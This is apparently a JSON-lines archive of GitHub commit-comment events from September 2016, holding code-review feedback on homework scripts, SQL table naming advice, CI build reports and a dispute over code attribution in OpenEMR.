{"id":"4572096377","type":"CommitCommentEvent","actor":{"login":"darwinanddavis"},"repo":{"name":"darwinanddavis/Sleepy_IBM"},"payload":{"comment":{"id":19048297,"position":2,"line":2,"path":"README.md","commit_id":"8ba1c82117611e6af5b76125a092b02b2171f614","created_at":"2016-09-16T04:12:11Z","updated_at":"2016-09-16T04:12:11Z","body":"RNL_new trans model_with DEB_1.6.1_olve_movement cost\r\n"}},"created_at":"2016-09-16T04:12:11Z"}
{"id":"4572096410","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048298,"position":null,"line":null,"path":null,"commit_id":"6c69713db6b9f455e347a33514d4325ff86a58fe","created_at":"2016-09-16T04:12:11Z","updated_at":"2016-09-16T04:12:11Z","body":"@kctrlv @tgisg @susiirwin I'm wondering if there is testing we want to do on our styling.... don't laugh. Is it worth our time to be super explicit in a feature test about what we want to see in each view? That way if we change something that strays from our wireframes we'll know because a test would fail. By explicit, I'm imagining a bunch of ```has_content```, ```has_css`` etc expectations that really layout what we are expecting to see."}},"created_at":"2016-09-16T04:12:11Z"}
{"id":"4572096437","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19048299,"position":null,"line":null,"path":null,"commit_id":"57091a2e9f2a7908f725f2d6989f60dde1892b1c","created_at":"2016-09-16T04:12:11Z","updated_at":"2016-09-16T04:12:11Z","body":"The following doc(s) have been deployed to the [1881kalabo](https://1881kalabo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/kalabox](https://1881kalabo-static-docs.pantheonsite.io/docs/kalabox)\n"}},"created_at":"2016-09-16T04:12:11Z"}
{"id":"4572098998","type":"CommitCommentEvent","actor":{"login":"davewasmer"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":19048303,"position":4,"line":59,"path":"lib/cli/commands/build.js","commit_id":"614bbd8e102bcf24d078800c072622f054e0f95b","created_at":"2016-09-16T04:13:25Z","updated_at":"2016-09-16T04:13:25Z","body":"Extraneous console.log?"}},"created_at":"2016-09-16T04:13:25Z"}
{"id":"4572099489","type":"CommitCommentEvent","actor":{"login":"davewasmer"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":19048308,"position":4,"line":96,"path":"lib/cli/commands/index.js","commit_id":"614bbd8e102bcf24d078800c072622f054e0f95b","created_at":"2016-09-16T04:13:39Z","updated_at":"2016-09-16T04:13:39Z","body":"Extraneous console.log?"}},"created_at":"2016-09-16T04:13:39Z"}
{"id":"4572100125","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"ramohse/dsp"},"payload":{"comment":{"id":19048311,"position":null,"line":null,"path":null,"commit_id":"a1981273935edfdb06add3199d7147031e03888a","created_at":"2016-09-16T04:13:59Z","updated_at":"2016-09-16T04:13:59Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @gfsoileau @aramnath @julialintern @galvin-mj\r\n\r\nHello @ramohse \r\n\r\nNice explanations on the first part of this work! Note that the predicate for the primes should be `if all(n % x for x in range(2, min(n, 11)))` rather than `if all(n % x for n in range(2, min(n, 11)))`.\r\n\r\nIn q6_strings.py:\r\n- The `donuts` function enters an infinite loop if one supplies a non-numeric argument. You need to break out of the `while` loop if the `except` branch is taken.\r\n- In `both_ends`, you don't need the string length to construct `new_s`, since you can write `new_s = s[:2]+s[-2:]`.\r\n- In `verbing`, you can write `s[-3:]` instead of `s[(l-3):]` where `l` is the length of `s`.\r\n- In `front_back`, `len(a)/2` equals 2 for a string `a` of length 5. What you want is `len(a)/2.0`, so as to get 2.5 for `len(a)=5`. Then `math.ceil(len(a)/2.0)` will give you 3.0. Finally, you still need to convert this to an integer in order to be able to slice. So you need `int(math.ceil(len(a)/2.0))`, and the same for string `b`.\r\n\r\nIn q7_lists.py:\r\n- In `match_ends`, you can replace `w[(len(w) -1)]` by `w[-1]`, and the statement `count = count` in the `else` branch does not do anything...\r\n- In `sort_last`, replace `tup[(len(tup) - 1)]` by `tup[-1]`.\r\n\r\nIn q8_parsing.py:\r\n- When you open a file for reading only, you might want to specify that: `f = open('football.csv', 'r')`.\r\n- Don't forget to close the `football.csv` file after you are done with it. You have to do this explicitly with a `f.close()` statement. As this is easy to forget, you may prefer to use the construct `with open('football.csv', 'r') as f:`, which does not require explicit closing.\r\n\r\nGood work! 👍 "}},"created_at":"2016-09-16T04:13:59Z"}
{"id":"4572102568","type":"CommitCommentEvent","actor":{"login":"MikeLydeamore"},"repo":{"name":"MikeLydeamore/ExNihiloAdscensio"},"payload":{"comment":{"id":19048312,"position":null,"line":null,"path":null,"commit_id":"88a47d31cef6a8b45f0617654e95c76859d057d3","created_at":"2016-09-16T04:15:10Z","updated_at":"2016-09-16T04:15:10Z","body":"(Inspired from 942af2fd5ccb7eba04b7b17afae832a1dce6df51)"}},"created_at":"2016-09-16T04:15:10Z"}
{"id":"4572104159","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19048327,"position":23,"line":23,"path":"issue18/login.sql","commit_id":"b73430127ca8a31d1489f9ea8249983549905212","created_at":"2016-09-16T04:15:57Z","updated_at":"2016-09-16T04:15:57Z","body":"ありがとうございます。\r\nテーブル名に関しては複数形が良いですかね！\r\nそしてユーザーを管理するテーブルなので `login` よりも `users` が良いかと思います。\r\n\r\nあとは今後のサービス開発する時のことも考えて必ず「created_at」「updated_at」のカラムを追加するようにしましょうか！\r\n\r\nまた発展としてphpmyadminから必要なカラムに「NOT NULL制約」もつけてみましょう(nameとpasswordかな？)。\r\nこちらまた調べるところからやってみましょう。"}},"created_at":"2016-09-16T04:15:57Z"}
{"id":"4572104223","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048330,"position":null,"line":null,"path":null,"commit_id":"6c69713db6b9f455e347a33514d4325ff86a58fe","created_at":"2016-09-16T04:15:59Z","updated_at":"2016-09-16T04:15:59Z","body":"@case-eee @s-espinosa Could either of you weigh in on the appropriateness of writing feature tests that check for specific content on a particular view... in pseudo code I'm thinking something like,\r\n\r\nvisit items_path\r\nwithin navbar, expect to see x y z\r\nwithin first div, expect a banner image and some words\r\nwithin the .items div, expect X number of thumbnails with Y classes\r\n\r\nI'm not suggesting that we test buttons, or routes, but merely make assertions about what we want to see on every page.\r\n\r\nIs this useful or a waste of time?"}},"created_at":"2016-09-16T04:15:59Z"}
{"id":"4572105604","type":"CommitCommentEvent","actor":{"login":"getogrand"},"repo":{"name":"triplepy/sh8email-django"},"payload":{"comment":{"id":19048349,"position":21,"line":44,"path":"sh8core/models.py","commit_id":"3ffa83d9318e29305a6d6bc1a4d01ce188ed0dc2","created_at":"2016-09-16T04:16:42Z","updated_at":"2016-09-16T04:16:42Z","body":"What a wonderful shortcut! Thank you @kyunooh !\r\nI'll use your code!"}},"created_at":"2016-09-16T04:16:42Z"}
{"id":"4572106213","type":"CommitCommentEvent","actor":{"login":"bsergean"},"repo":{"name":"getsentry/sentry"},"payload":{"comment":{"id":19048351,"position":null,"line":null,"path":null,"commit_id":"7f9e36c9c361b1bc442bf8c88c049f285cd35b29","created_at":"2016-09-16T04:16:59Z","updated_at":"2016-09-16T04:16:59Z","body":"SENT_MESSAGE value does not have an _ / is this on purpose ?"}},"created_at":"2016-09-16T04:16:59Z"}
{"id":"4572107076","type":"CommitCommentEvent","actor":{"login":"koradiavatsal"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19048353,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-16T04:17:28Z","updated_at":"2016-09-16T04:17:28Z","body":"@akhilnarang no, now *samosa* time. 😂"}},"created_at":"2016-09-16T04:17:28Z"}
{"id":"4572107230","type":"CommitCommentEvent","actor":{"login":"dcramer"},"repo":{"name":"getsentry/sentry"},"payload":{"comment":{"id":19048354,"position":null,"line":null,"path":null,"commit_id":"7f9e36c9c361b1bc442bf8c88c049f285cd35b29","created_at":"2016-09-16T04:17:33Z","updated_at":"2016-09-16T04:17:33Z","body":"@bsergean nope thats a bug, good catch"}},"created_at":"2016-09-16T04:17:33Z"}
{"id":"4572107258","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19048355,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T04:17:34Z","updated_at":"2016-09-16T04:17:34Z","body":"Not 1 line of code here is the same..."}},"created_at":"2016-09-16T04:17:34Z"}
{"id":"4572109447","type":"CommitCommentEvent","actor":{"login":"Winbobob"},"repo":{"name":"expertiza/expertiza"},"payload":{"comment":{"id":19048358,"position":null,"line":null,"path":null,"commit_id":"4492b1fe140170eb6d70d0e731cff64d3e0014fb","created_at":"2016-09-16T04:18:41Z","updated_at":"2016-09-16T04:18:41Z","body":"![466806693369237568](https://cloud.githubusercontent.com/assets/7702035/18575223/19953290-7ba3-11e6-9321-6fb00f22d203.jpg)\r\n"}},"created_at":"2016-09-16T04:18:41Z"}
{"id":"4572110525","type":"CommitCommentEvent","actor":{"login":"tomusiaka"},"repo":{"name":"morrisonbrett/BlackVueDownloader"},"payload":{"comment":{"id":19048361,"position":7,"line":15,"path":"readme.md","commit_id":"2c7bb2a6ea736097bbe9e70543a3d729108fcbeb","created_at":"2016-09-16T04:19:15Z","updated_at":"2016-09-16T04:19:15Z","body":"You can connect your camera to your home Wifi and then in the router you can reserve an ip address for that camera so that it is always the same. Then, you can just provide that ip address as a parameter and it will work through your home network without an extra WiFi adapter."}},"created_at":"2016-09-16T04:19:15Z"}
{"id":"4572113813","type":"CommitCommentEvent","actor":{"login":"aethelwulffe"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19048366,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T04:20:57Z","updated_at":"2016-09-16T04:20:57Z","body":"Not in content, timing, inspiration or anything.  Of course. Right.\n\n\nOn 2016-09-16 12:17 AM, Brady Miller wrote:\n>\n> Not 1 line of code here is the same...\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/openemr/openemr/commit/00ca05981d066657c47feef302b1fc91026144bb#commitcomment-19048355>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AAhzF8IJ21pOYSp3HdGWY1yGJdZtTqmoks5qqhhggaJpZM4J-iJR>.\n>\n\n"}},"created_at":"2016-09-16T04:20:57Z"}
{"id":"4572119563","type":"CommitCommentEvent","actor":{"login":"yurabakhtin"},"repo":{"name":"b2evolution/b2evolution"},"payload":{"comment":{"id":19048409,"position":63,"line":414,"path":"install/index.php","commit_id":"c5d17d0842ed0e7a14594aa0e4d78e1a7458e47b","created_at":"2016-09-16T04:23:43Z","updated_at":"2016-09-16T04:23:43Z","body":"I don't understand why I added this on https://github.com/b2evolution/b2evolution/commit/de05f08f0a2d17757e3ce968cf9d0090724bcac4#diff-18953e7c0e692c6ab67aceaf2f4ff0d7R408 It seems on my copy/paste mistake.\r\nSorry for that and thank you for the fix."}},"created_at":"2016-09-16T04:23:43Z"}
{"id":"4572120495","type":"CommitCommentEvent","actor":{"login":"ahmedjouirou"},"repo":{"name":"ChibiOS/ChibiOS"},"payload":{"comment":{"id":19048412,"position":null,"line":null,"path":null,"commit_id":"4491129f54af198c7df8507b07e2d3a93581b998","created_at":"2016-09-16T04:24:10Z","updated_at":"2016-09-16T04:24:10Z","body":"what are the changes made for lwip-1.4.1_patched.7z , (ie why is it patched version) , all the abstractions/interfaces are already made in the os various folder ?"}},"created_at":"2016-09-16T04:24:10Z"}
{"id":"4572122715","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048418,"position":null,"line":null,"path":null,"commit_id":"a50eadb1622126cc689ee89ca76b3270e3d16f95","created_at":"2016-09-16T04:25:17Z","updated_at":"2016-09-16T04:25:17Z","body":"makingPrettyTransition (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2329 of 2336 tests passed, 3 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T04:25:17Z"}
{"id":"4572128066","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19048426,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T04:27:49Z","updated_at":"2016-09-16T04:27:49Z","body":"Again, not 1 line of code was the same...\r\nIf it merited attribution, then this is an example of what I would of done:\r\nhttps://github.com/openemr/openemr/commit/48ade3f9c971bdab5dddfe598c7e6654fa1c55b7"}},"created_at":"2016-09-16T04:27:49Z"}
{"id":"4572128582","type":"CommitCommentEvent","actor":{"login":"Bairullah95"},"repo":{"name":"sathishstorm/android-remote"},"payload":{"comment":{"id":19048430,"position":null,"line":null,"path":null,"commit_id":"9be3c330e585dbe5b0dcc53cc40cb039675c3e0b","created_at":"2016-09-16T04:28:05Z","updated_at":"2016-09-16T04:28:05Z","body":"I'm sorry...Apparently I still couldn't figure it out...mind giving me the\ninstruction...\n\n\nOn 27 August 2016 at 18:22, sathishstorm <notifications@github.com> wrote:\n\n> hi\n> this app needs a dotnet server running background.so that it can access the\n> system. hence you need that application to be running .\n>\n> On Sun, Aug 21, 2016 at 11:28 PM, Bairullah95 <notifications@github.com>\n> wrote:\n>\n> > I'm currently having problem with your project as I try to run it....The\n> > Apps look great but apparently the apps doesn't seem to acknowledge the\n> IP\n> > Address i had provided? do you mind telling me how does your apps work?\n> > thank you so much\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/sathishstorm/android-remote/commit/\n> 9be3c330e585dbe5b0dcc53cc40cb039675c3e0b#commitcomment-18717517>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AGVugm3PkVTdO_\n> FqVd2En48LtnlpnLx6ks5qiJGxgaJpZM4JpWU5>\n> > .\n> >\n>\n>\n>\n> --\n> Thanks and Regards,\n> D.Sathish.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sathishstorm/android-remote/commit/9be3c330e585dbe5b0dcc53cc40cb039675c3e0b#commitcomment-18802319>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATw8NjZGQRCjxBuutCLs_4chm79JW-Szks5qkA_PgaJpZM4JpWU5>\n> .\n>\n"}},"created_at":"2016-09-16T04:28:05Z"}
{"id":"4572129973","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19048433,"position":null,"line":null,"path":null,"commit_id":"9addd2d4b6f0abbf42aefc3076f4e0a41d1b0edd","created_at":"2016-09-16T04:28:47Z","updated_at":"2016-09-16T04:28:47Z","body":"Actually we don't need it anymore since we share utils on all distributions ... thanks. I made some cleaning because of this note: \r\nhttps://github.com/igorpecovnik/lib/commit/4c54309b7b1c681817dfc733d26ccf56b08aedf3"}},"created_at":"2016-09-16T04:28:47Z"}
{"id":"4572131084","type":"CommitCommentEvent","actor":{"login":"colin-marshall"},"repo":{"name":"olefredrik/FoundationPress"},"payload":{"comment":{"id":19048436,"position":16,"line":16,"path":".babelrc","commit_id":"9e83b23b346675afa5dc0e2a5d34e8b07fd28bc1","created_at":"2016-09-16T04:29:20Z","updated_at":"2016-09-16T04:29:20Z","body":"@Aetles I was just keeping it on par with the [Foundation Zurb Template](https://github.com/zurb/foundation-zurb-template). Couldn't find much about why it's set to false in the issues in the foundation-sites repo. Have you experimented with the default (auto) setting or setting it to true? Sounds like it might be useful."}},"created_at":"2016-09-16T04:29:20Z"}
{"id":"4572132665","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-city"},"payload":{"comment":{"id":19048439,"position":9,"line":9,"path":"Assignment 6/starter_code/js/index.js","commit_id":"f5d9a864b132470f6032493e7510281545fbd963","created_at":"2016-09-16T04:30:11Z","updated_at":"2016-09-16T04:30:11Z","body":"Great job on the `for` loop. Next time try to remember to declare the variable `i`  like `var i` above the loop or something like\r\n```\r\nfor (var i = 0; i < cities.length; i++)\r\n```\r\n\r\nWhen you don't declare it it is called polluting the global scope and is not the best practice."}},"created_at":"2016-09-16T04:30:11Z"}
{"id":"4572133639","type":"CommitCommentEvent","actor":{"login":"kyunooh"},"repo":{"name":"triplepy/sh8email-django"},"payload":{"comment":{"id":19048442,"position":21,"line":44,"path":"sh8core/models.py","commit_id":"3ffa83d9318e29305a6d6bc1a4d01ce188ed0dc2","created_at":"2016-09-16T04:30:38Z","updated_at":"2016-09-16T04:30:38Z","body":"Thank you for saying like that :D"}},"created_at":"2016-09-16T04:30:38Z"}
{"id":"4572134922","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19048445,"position":23,"line":23,"path":"issue18/login.sql","commit_id":"b73430127ca8a31d1489f9ea8249983549905212","created_at":"2016-09-16T04:31:18Z","updated_at":"2016-09-16T04:31:18Z","body":"実はもうひとつ(おそらくnameカラムに)制約をかける必要があります。それはlogin.phpを修正しつつ気づいた段階でつけてみましょう。"}},"created_at":"2016-09-16T04:31:18Z"}
{"id":"4572135002","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwiki/xwiki-enterprise"},"payload":{"comment":{"id":19048446,"position":34,"line":838,"path":"xwiki-enterprise-web/pom.xml","commit_id":"9bfdab74f35bf8d0cf94b28979104de1f0a74cec","created_at":"2016-09-16T04:31:20Z","updated_at":"2016-09-16T04:31:20Z","body":"Should be ``${platform.version}``."}},"created_at":"2016-09-16T04:31:20Z"}
{"id":"4572137294","type":"CommitCommentEvent","actor":{"login":"nicksnyder"},"repo":{"name":"linkedin/ConsistencyManager-iOS"},"payload":{"comment":{"id":19048450,"position":11,"line":24,"path":"build.sh","commit_id":"23507502e28db01f536d8999a6724c583fe05dff","created_at":"2016-09-16T04:32:32Z","updated_at":"2016-09-16T04:32:32Z","body":"they are supported now, I just had reliability issues with 8.4"}},"created_at":"2016-09-16T04:32:32Z"}
{"id":"4572140918","type":"CommitCommentEvent","actor":{"login":"williamd1k0"},"repo":{"name":"godotengine/godot-demo-projects"},"payload":{"comment":{"id":19048451,"position":27,"line":27,"path":"2d/split_screen_platformer/engine.cfg","commit_id":"10fcf1629ba8e27f9068ca13f207d1255ce9acdb","created_at":"2016-09-16T04:34:21Z","updated_at":"2016-09-16T04:34:21Z","body":"I'm commenting here because this does not need a PR.\r\nNeed to remove the Return key on this line because the player 1 is shooting and jumping at the same time.\r\nThanks."}},"created_at":"2016-09-16T04:34:21Z"}
{"id":"4572144284","type":"CommitCommentEvent","actor":{"login":"trentxintong"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19048461,"position":null,"line":null,"path":null,"commit_id":"d00cec75db8f5f353dab62d5683f58b314cb1c7e","created_at":"2016-09-16T04:36:03Z","updated_at":"2016-09-16T04:36:03Z","body":"I do not see noticeable compilation improvement with this patch. "}},"created_at":"2016-09-16T04:36:03Z"}
{"id":"4572146499","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19048464,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T04:37:09Z","updated_at":"2016-09-16T04:37:09Z","body":"I assumed we were all on the same page regarding sharing of ideas and code. Let me know if this assumption is incorrect."}},"created_at":"2016-09-16T04:37:09Z"}
{"id":"4572148489","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048469,"position":null,"line":null,"path":null,"commit_id":"a50eadb1622126cc689ee89ca76b3270e3d16f95","created_at":"2016-09-16T04:38:08Z","updated_at":"2016-09-16T04:38:08Z","body":"makingPrettyTransition (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1763 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.88%25-green.svg)</a>\n"}},"created_at":"2016-09-16T04:38:08Z"}
{"id":"4572150945","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048473,"position":null,"line":null,"path":null,"commit_id":"a50eadb1622126cc689ee89ca76b3270e3d16f95","created_at":"2016-09-16T04:39:22Z","updated_at":"2016-09-16T04:39:22Z","body":"makingPrettyTransition (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T04:39:22Z"}
{"id":"4572152272","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19048475,"position":null,"line":null,"path":null,"commit_id":"3c85531fb3d058f55a4697d9f4aed7f0365dbd40","created_at":"2016-09-16T04:40:06Z","updated_at":"2016-09-16T04:40:06Z","body":"Related to: backdrop/backdrop-issues#2051 "}},"created_at":"2016-09-16T04:40:06Z"}
{"id":"4572157005","type":"CommitCommentEvent","actor":{"login":"YanLiang1102"},"repo":{"name":"oudalab/fajita"},"payload":{"comment":{"id":19048484,"position":29,"line":30,"path":"public/js/controllers/services.js","commit_id":"acf91ecf02c8dfbf2f52253de5c3cf3ab2b067f5","created_at":"2016-09-16T04:42:34Z","updated_at":"2016-09-16T04:42:34Z","body":"this is the main change to make getStatus returen a promise, in that way it will wait until the status being check before make the next check!"}},"created_at":"2016-09-16T04:42:34Z"}
{"id":"4572158265","type":"CommitCommentEvent","actor":{"login":"YanLiang1102"},"repo":{"name":"oudalab/fajita"},"payload":{"comment":{"id":19048485,"position":10,"line":10,"path":"public/partials/home.html","commit_id":"acf91ecf02c8dfbf2f52253de5c3cf3ab2b067f5","created_at":"2016-09-16T04:43:13Z","updated_at":"2016-09-16T04:43:13Z","body":"this looks like solving the \"$.widget is not a function\" problem"}},"created_at":"2016-09-16T04:43:13Z"}
{"id":"4572159342","type":"CommitCommentEvent","actor":{"login":"YanLiang1102"},"repo":{"name":"oudalab/fajita"},"payload":{"comment":{"id":19048487,"position":35,"line":120,"path":"public/js/core.js","commit_id":"acf91ecf02c8dfbf2f52253de5c3cf3ab2b067f5","created_at":"2016-09-16T04:43:45Z","updated_at":"2016-09-16T04:43:45Z","body":"make next step until the promise returned, I think this solve the problem"}},"created_at":"2016-09-16T04:43:45Z"}
{"id":"4572165090","type":"CommitCommentEvent","actor":{"login":"aaron02"},"repo":{"name":"DankoDJ/AscEmu"},"payload":{"comment":{"id":19048495,"position":79,"line":8780,"path":"src/world/Units/Players/Player.cpp","commit_id":"a15eb6550849aa38a5c709edae19088702db67ec","created_at":"2016-09-16T04:46:38Z","updated_at":"2016-09-16T04:46:38Z","body":"On these two there is missing playerinfo these get loaded from db. Insteas of return 0 get the info from playerinfo"}},"created_at":"2016-09-16T04:46:38Z"}
{"id":"4572165614","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19048496,"position":null,"line":null,"path":null,"commit_id":"9c5a9a8aef5eeff82e3c29c164e5fb09a8f1d458","created_at":"2016-09-16T04:46:55Z","updated_at":"2016-09-16T04:46:55Z","body":"Related to: backdrop/backdrop-issues#2196 "}},"created_at":"2016-09-16T04:46:55Z"}
{"id":"4572167147","type":"CommitCommentEvent","actor":{"login":"rohit-batra"},"repo":{"name":"Microsoft/vsts-tasks"},"payload":{"comment":{"id":19048499,"position":115,"line":195,"path":"Tasks/SqlAzureDacpacDeployment/Utility.ps1","commit_id":"4cefaf18b6753d0408be6d97715ae86e404e6822","created_at":"2016-09-16T04:47:41Z","updated_at":"2016-09-16T04:47:41Z","body":"Hi @mathieu-benoit ,\r\nGot it. I guess(Most Probably) due to indirection part of error is missing here. I have some probable check in mind , which i will try in couple of days & discuss here to see if we can include it by next release sprint which will be in 2-3 weeks time.\r\n\r\nI hope that's OK\r\n\r\nThanks \r\nRohit"}},"created_at":"2016-09-16T04:47:41Z"}
{"id":"4572169992","type":"CommitCommentEvent","actor":{"login":"StoneOffStones"},"repo":{"name":"StoneOffStones/plugin.video.xstream"},"payload":{"comment":{"id":19048502,"position":null,"line":null,"path":null,"commit_id":"fe14407aba3dc9ba0892c350c22078421a26fe01","created_at":"2016-09-16T04:49:06Z","updated_at":"2016-09-16T04:49:06Z","body":"Hey,\n\nhatte das damals mit Absicht nicht mit Hilfsmitteln wie tinyPNG oder so verkleinert, da dann meiner Meinung die farblichen Abstufungen im Hintergrund verstärkt zu sehen waren."}},"created_at":"2016-09-16T04:49:06Z"}
{"id":"4572172262","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ananya-bhattacharya/hydrator-plugins"},"payload":{"comment":{"id":19048504,"position":null,"line":null,"path":null,"commit_id":"23d73d83ab7128bdb2938eefccd361685627dec1","created_at":"2016-09-16T04:50:17Z","updated_at":"2016-09-16T04:50:17Z","body":"Changed access modifiers for non-private methods to package private."}},"created_at":"2016-09-16T04:50:17Z"}
{"id":"4572175227","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-city"},"payload":{"comment":{"id":19048507,"position":8,"line":8,"path":"Assignment 6/starter_code/js/index.js","commit_id":"f5d9a864b132470f6032493e7510281545fbd963","created_at":"2016-09-16T04:51:43Z","updated_at":"2016-09-16T04:51:43Z","body":"Great job with comments and pseudocoding!"}},"created_at":"2016-09-16T04:51:43Z"}
{"id":"4572176672","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-city"},"payload":{"comment":{"id":19048509,"position":null,"line":null,"path":null,"commit_id":"f5d9a864b132470f6032493e7510281545fbd963","created_at":"2016-09-16T04:52:22Z","updated_at":"2016-09-16T04:52:22Z","body":"You are doing very well and seem to be understanding all the material. Perhaps try some of the bonus challenges :)"}},"created_at":"2016-09-16T04:52:22Z"}
{"id":"4572177645","type":"CommitCommentEvent","actor":{"login":"ZombieRoxtar"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19048510,"position":76,"line":76,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-16T04:52:50Z","updated_at":"2016-09-16T04:52:50Z","body":"This is copy pasta. I only know what breaks when I remove it. (See above.)"}},"created_at":"2016-09-16T04:52:50Z"}
